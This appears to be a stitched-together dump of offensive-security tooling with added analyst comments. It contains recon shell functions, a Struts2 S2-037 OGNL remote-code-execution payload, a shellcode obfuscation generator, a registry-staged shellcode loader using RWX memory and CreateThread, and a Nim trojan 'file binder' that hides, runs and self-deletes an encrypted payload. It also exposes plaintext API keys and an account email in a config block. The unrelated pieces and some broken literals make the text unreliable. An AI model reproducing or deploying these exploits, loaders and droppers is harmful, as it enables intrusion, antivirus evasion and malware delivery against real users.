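# Passive subdomain enumeration for one domain ($1).
# Each tool writes "<domain>-<tool>.txt"; the merged, de-duplicated list is
# left in "<domain>-basic". Only this function's own per-tool files are
# merged and removed afterwards: the original `cat *.txt` / `rm -rf *.txt`
# swallowed, and then deleted, every unrelated .txt file in the working
# directory, and unquoted "$1" broke on any unusual argument.
Recon() {
  local domain="$1"
  if [ -z "$domain" ]; then
    echo "usage: Recon <domain>" >&2
    return 1
  fi
  ./assetfinder --subs-only "$domain" > "$domain-assetfinder.txt"
  ./ksubdomain -d "$domain" -silent -skip-wild -full -o "$domain-ksubdomain.txt"
  ./subfinder -d "$domain" -all -silent > "$domain-subfinder.txt"
  ./findomain -t "$domain" -q > "$domain-findomain.txt"
  ./amass enum -passive -norecursive -noalts -d "$domain" -o "$domain-amass.txt"
  # `sort -u` is the same as `sort | uniq`; only our own outputs are merged.
  sort -u "$domain-assetfinder.txt" "$domain-ksubdomain.txt" \
          "$domain-subfinder.txt" "$domain-findomain.txt" \
          "$domain-amass.txt" > "$domain-basic"
  rm -f "$domain-assetfinder.txt" "$domain-ksubdomain.txt" \
        "$domain-subfinder.txt" "$domain-findomain.txt" "$domain-amass.txt"
}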
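# Permutation and resolution pass over the "<domain>-basic" list produced by
# Recon, carried out in ../subdomain2: altdns generates candidates from
# words.dic, massdns resolves them (A records, simple output), the resolved
# names are merged with the basic list into "<domain>-all", and only the
# intermediate files of this run are removed. The original continued after a
# failed `cd` (running altdns/massdns and `rm -rf *.txt` in the wrong
# directory) and deleted every .txt file there, not just its own.
Mass() {
  local domain="$1"
  if [ -z "$domain" ]; then
    echo "usage: Mass <domain>" >&2
    return 1
  fi
  cp "$domain-basic" ../subdomain2 || return 1
  cd ../subdomain2 || return 1
  altdns -i "$domain-basic" -w words.dic -o "$domain-altdns.txt"
  ./massdns/bin/massdns -r ./massdns/lists/resolvers.txt -t A -o S \
      -w "${domain}_A_CNAME.txt" < "$domain-altdns.txt"
  # The sed expressions are kept verbatim from the original; they assume
  # massdns' simple ("-o S") `name. TYPE value` line shape and leave the
  # bare hostname.
  sed 's/A.*//; s/..$//; s/CN.*//' "${domain}_A_CNAME.txt" > "$domain-massdns.txt"
  sort -u "$domain-basic" "$domain-massdns.txt" > "$domain-all"
  rm -f "$domain-altdns.txt" "${domain}_A_CNAME.txt" "$domain-massdns.txt"
}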
3B822693-993e-1dac2-632e-b97337be0e4
docker pull medicean/vulapps:s_struts2_s2-037
docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
http://ip:80/orders/3/
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=id
import random
import sys
# Analyst note: this is a reversible substitution encoding, not encryption.
# The hex alphabet is shuffled once, every hex nibble of the input file is
# replaced by its index in the shuffled alphabet, and the emitted
# Offset_shellcode.py carries both the alphabet and the index list, so the
# original bytes are recoverable from the generated file alone.
# Python 2 only: str.encode('hex') and buf.decode('hex') do not exist on
# Python 3.
string = '0123456789abcdef'
str_list = list(string)
random.shuffle(str_list)          # unseeded: the alphabet differs on every run
string2 = ''.join(str_list)       # the substitution key
a = open(sys.argv[1],'rb')        # input file handle is never closed
b = a.read().encode('hex')        # file contents as a lowercase hex string
list = []                         # shadows the builtin `list`
for i in b:
    b = string2.find(i)           # rebinds `b` to an int each iteration; the
    list.append(b)                # loop still walks the original hex string
f = open('Offset_shellcode.py','w')
# Each write below spans a physical line break inside its literal; the
# original presumably used `\n` escapes that were lost in extraction.
f.write("string = '{}'
".format(string2))
f.write("list = {}
".format(list))
f.write("buf = ''
for i in list:
buf+=string[i]
shellcode=bytearray(buf.decode('hex'))
")
补丁网盘链接:
链接: https://pan.baidu.com/s/1vo_teu41pA-v9OYfC9wprQ 密码: ndao
# Module API configuration
#
# NOTE(review): several values below (censys_api_id/secret, chinaz_api,
# fofa_api_email/key, shodan_api_key) are real-looking credentials committed
# as plaintext literals. Treat any key that has been checked in as exposed:
# rotate it at the provider and load it from the environment or from a file
# kept out of version control instead of keeping it here.
# Censys: a free account provides an API key: https://censys.io/api
censys_api_id = '27006dda-b551-40cc-a592-a2577847c764'
censys_api_secret = 'vXob9EOio9V7w2jTtBrZdI1iyYNzblCJ'
# BinaryEdge: a free account provides an API key: https://app.binaryedge.io/account/api
# The free key is valid for only one month; it can be regenerated after it
# expires and allows 250 queries per month.
binaryedge_api = ''
# Chinaz: a free account provides an API key: http://api.chinaz.com/ApiDetails/Alexa
chinaz_api = 'df69b6ddcb634105b2d6599151d5b02b'
# Bing: a free account provides an API key: https://azure.microsoft.com/zh-cn/services/
# cognitive-services/bing-web-search-api/#web-json
bing_api_id = ''
bing_api_key = ''
# SecurityTrails: a free account provides an API key: https://securitytrails.com/corp/api
securitytrails_api = ''
# https://fofa.so/api
fofa_api_email = 'm13724810865_2@163.com' # FOFA account email
fofa_api_key = '1f8566b6d6c1e86d9622b14da3ee8d5d' # FOFA account key
# Google: a free account provides an API key:
# The free API only returns the first 100 results
# https://developers.google.com/custom-search/v1/overview#search_engine_id
# After creating the custom search engine, enable "Search the entire web" in its control panel
google_api_id = '' # Google custom search engine id
# https://developers.google.com/custom-search/v1/overview#api_key
google_api_key = '' # Google custom search API key
# https://api.passivetotal.org/api/docs/
riskiq_api_username = ''
riskiq_api_key = ''
# Shodan: a free account provides an API key: https://account.shodan.io/register
# The free API is rate-limited to one query per second
shodan_api_key = 'CID5rmCYAFd391vHGcLlALXUBjAIOU4V'
# ThreatBook: subdomain queries through the API are a paid feature https://x.threatbook.cn/nodev4/vb4/myAPI
threatbook_api_key = ''
# VirusTotal: a free account provides an API key: https://developers.virustotal.com/reference
virustotal_api_key = ''
# https://www.zoomeye.org/doc?channel=api
zoomeye_api_usermail = ''
zoomeye_api_password = ''
# Spyse: a free account provides an API key: https://spyse.com/
spyse_api_token = ''
# https://www.circl.lu/services/passive-dns/
circl_api_username = ''
circl_api_password = ''
# https://www.dnsdb.info/
dnsdb_api_key = ''
# ipv4info: a free account provides an API key: http://ipv4info.com/tools/api/
# The free key is valid for only two days; it can be regenerated after it
# expires and allows 50 queries per day.
ipv4info_api_key = ''
# https://github.com/360netlab/flint
# passivedns_api_addr: leave empty to use the default http://api.passivedns.cn
# passivedns_api_token may be left empty
passivedns_api_addr = ''
passivedns_api_token = ''
# A GitHub token can be generated at https://github.com/settings/tokens; user is the GitHub username
# Used for subdomain takeover checks and subdomain collection
github_api_user = ''
github_api_token = ''
# obtain Cloudflare API key from https://dash.cloudflare.com/profile/api-tokens
cloudflare_api_token = ''
默认是x64位的msf
from ctypes import *
from ctypes import wintypes
import ctypes
# Analyst note on the sequence below: the payload is parked in the registry
# as a REG_BINARY value directly under the HKEY_CURRENT_USER root, read back
# into a freshly allocated RWX region, the registry value is deleted, and the
# region is started as a thread. An RWX VirtualAlloc followed by CreateThread
# on a non-module address, and the transient HKCU value named "test", are the
# observable artefacts on a host.
buf = b""
# As printed, this literal is b"x56xffxd5" without backslashes — nine ASCII
# characters rather than three raw bytes — so the \xNN escapes appear to have
# been lost in extraction; the original presumably held a longer stage.
buf += b"x56xffxd5"
# -2147483647 is 0x80000001 as a signed 32-bit value, i.e. HKEY_CURRENT_USER;
# 3 is REG_BINARY. The value is written under the root key itself.
ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
LPBYTE = POINTER(c_byte)
ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
# 800 bytes, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40).
ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
data_len = wintypes.DWORD()
# The first call only sizes the value; the second copies it into the RWX
# buffer. Return codes of the registry calls are not checked.
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
# Remove the staging value again.
ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
# Execute the buffer on a new thread and wait for it without timeout
# (-1 == INFINITE).
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
#author @evilash
import os
import base64
import strfmt
import osproc
import nimcrypto
import nimcrypto/sysrand
# Usage banner; `main` prints it for -h/--help and when no arguments are given.
let help = """
+-+-+-+-+-+-+-+-+-+-+-+-+-+
|N i m F i l e B i n d e r|
+-+-+-+-+-+-+-+-+-+-+-+-+-+
@evilash
It's a FileBinder writen by Nim
And just a *rough* tool of learning Nim
Usage:
./NimFileBinder <evil> <NormalFile> <key>
-h,--help : help
"""
func toByteSeq*(str: string): seq[byte] {.inline.} =
  ## Returns the bytes of `str` as a `seq[byte]`, one element per character
  ## (the string's terminating NUL is not included). An empty string yields
  ## an empty seq.
  result = newSeqOfCap[byte](str.len)
  for ch in str:
    result.add byte(ch)
proc EncryptFile(File1, File2, key: string): void =
  ## Writes `outfile.nim`, a generated Nim program that carries `File1`
  ## (AES-256-CTR encrypted, then base64) and `File2` (base64 only) as string
  ## literals together with the IV and the passphrase `key`, so that the
  ## compiled result can unpack and start both on the target.
  ##
  ## Analyst note: the passphrase, IV and ciphertext are all embedded in the
  ## generated source as plain literals, so the AES layer provides no
  ## confidentiality against anyone holding the produced binary — the
  ## payload can be recovered by replaying the steps the template itself
  ## performs. It only prevents a signature match on the raw payload bytes.
  var
    Content1 = readFile(File1)
    Content2 = readFile(File2)
    EnContent1 = encode(Content1)   # base64 (std/base64)
    EnContent2 = encode(Content2)   # pasted verbatim into the template
  var
    # encode() followed by decode() is a round trip: `data` is the raw content
    # of File1. An empty File1 makes `data[0]` below raise an IndexDefect.
    data: seq[byte] = toByteSeq(decode(EnContent1))
    envkey: string = key
    ectx, dctx: CTR[aes256]           # dctx is declared but never used here
    key: array[aes256.sizeKey, byte]  # shadows the `key` parameter from here on
    iv: array[aes256.sizeBlock, byte]
    plaintext = newSeq[byte](len(data))
    enctext = newSeq[byte](len(data))
    b64iv: string
  # Create Random IV (16 == aes256.sizeBlock); the byte count returned by
  # randomBytes is discarded rather than checked.
  discard randomBytes(addr iv[0], 16)
  # We do not need to pad data, `CTR` mode works byte by byte.
  # `plaintext` becomes a byte-for-byte copy of `data`.
  copyMem(addr plaintext[0], addr data[0], len(data))
  # Expand key to 32 bytes using SHA256 as the KDF: a single unsalted hash of
  # the passphrase, no stretching (and the passphrase is embedded below anyway).
  var expandedkey = sha256.digest(envkey)
  copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
  ectx.init(key, iv)
  ectx.encrypt(plaintext, enctext)
  ectx.clear()
  b64iv = encode(iv)
  var B64EnCryContent: string = encode(enctext)
  # Dropper template. The `{}` placeholders are filled positionally by
  # strfmt's `fmt` (see the call after the literal): the `{.inline.}` pragma
  # text is passed as an argument so its braces are not parsed as a
  # placeholder, then the base64 ciphertext of File1, base64 of File2, the
  # base64 IV, the passphrase, len(data) twice (buffer sizes), and File1 and
  # File2 as typed on the command line, which become the output file names.
  # What the generated program does, as visible in the literal: writes File2
  # to its working directory and opens it through `cmd /k start`, writes the
  # decrypted File1 under C:\Windows\Temp\ and runs it through `cmd /c`, then
  # deletes its own executable (paramStr(0)) via ShellExecute. Those paths
  # and the cmd.exe child processes are the artefacts to look for on a host.
  var BinderTemplete: string = """
import base64
import winim
import encodings
import nimcrypto
import nimcrypto/sysrand
import os
func toByteSeq*(str: string): seq[byte] {} =
## Converts a string to the corresponding byte sequence.
@(str.toOpenArrayByte(0, str.high))
var evilbase64 = "{}"
var data2: seq[byte] = toByteSeq(decode(evilbase64))
var BindFilebase64 = "{}"
var deb64iv = decode("{}")
var
envkey: string = "{}"
dctx: CTR[aes256]
key: array[aes256.sizeKey, byte]
iv: array[aes256.sizeBlock, byte]
crypttext = newSeq[byte]({})
dectext = newSeq[byte]({})
copyMem(addr crypttext[0], addr data2[0], len(data2))
var expandedkey = sha256.digest(envkey)
copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
copyMem(addr iv[0], addr deb64iv[0], aes256.sizeBlock)
dctx.init(key, iv)
dctx.decrypt(crypttext, dectext)
dctx.clear()
let decoded_Bindfile = decode(BindFilebase64)
var evilname: string = "{}"
var Bindfilename: string = "{}"
writeFile(Bindfilename, decoded_Bindfile)
var utf8evilname =convert(evilname,"GB2312","UTF-8")
var utf8Bindfilename =convert(Bindfilename,"GB2312","UTF-8")
WinExec("cmd /k start " & utf8Bindfilename, SW_HIDE);
writeFile(r"C:\Windows\Temp\" & utf8evilname, dectext)
#writeFile(r"C:\Windows\Temp\calc.txt" , dectext)
#copyFile("C:\Windows\Temp\calc.txt", "C:\Windows\Temp\calc.exe")
#removeFile("C:\Windows\Temp\calc.txt")
WinExec("cmd /c C:\Windows\Temp\" & utf8evilname, SW_HIDE);
#WinExec("cmd /c C:\Windows\Temp\calc.exe", SW_HIDE);
ShellExecute(0, "open", "cmd.exe", "/c del " & paramStr(0), NULL, SW_HIDE)
#WinExec("cmd.exe /c del temp.exe", SW_HIDE)
""".fmt("{.inline.}", B64EnCryContent, EnContent2, b64iv, envkey, len(data), len(data), File1, File2)
  writeFile(r"outfile.nim", BinderTemplete)
proc CompileFile(): void =
  ## Compiles the generated `outfile.nim` into a Windows x64 GUI executable
  ## (cross-compiled with mingw; -d:danger, stripped, size-optimised, LTO)
  ## and then removes the source file.
  # The compiler's exit status is captured but never examined, so a failed
  # build goes unnoticed and the source is still deleted below.
  let errC = execCmd("nim c --cpu:amd64 -d:mingw --app:gui -d:danger -d:strip --opt:size --passc=-flto --passl=-flto {}".fmt("outfile.nim"))
  # tryRemoveFile's bool result is likewise ignored.
  var rmhandle = tryRemoveFile("outfile.nim")
proc main() =
  ## Command-line entry point. With exactly three arguments
  ## (<evil> <NormalFile> <key>) it generates and compiles the binder; with a
  ## single `-h`/`--help`, or no arguments, it prints `help`.
  if paramCount() == 3:
    var
      TraojanFile: string = paramStr(1)
      NormalFile: string = paramStr(2)
      Enkey: string = paramStr(3)
    EncryptFile(TraojanFile, NormalFile, Enkey)
    CompileFile()
    return
  if paramCount() == 1 and (paramStr(1) == "-h" or paramStr(1) == "--help"):
    echo help
    return
  if paramCount() == 0:
    echo help
    return
  else:
    # Reached for any other argument count (1, 2, 4+). The message says "two
    # arguments" although the usage line requires three, and the literal
    # spans a physical line break, which a plain "..." string does not allow
    # in Nim — the original presumably used `\n` and lost it in extraction.
    echo " Expect two arguments
ex: ./NimFileBinder <evil> <NormalFile> <key>"
    return
# Run on module load.
main()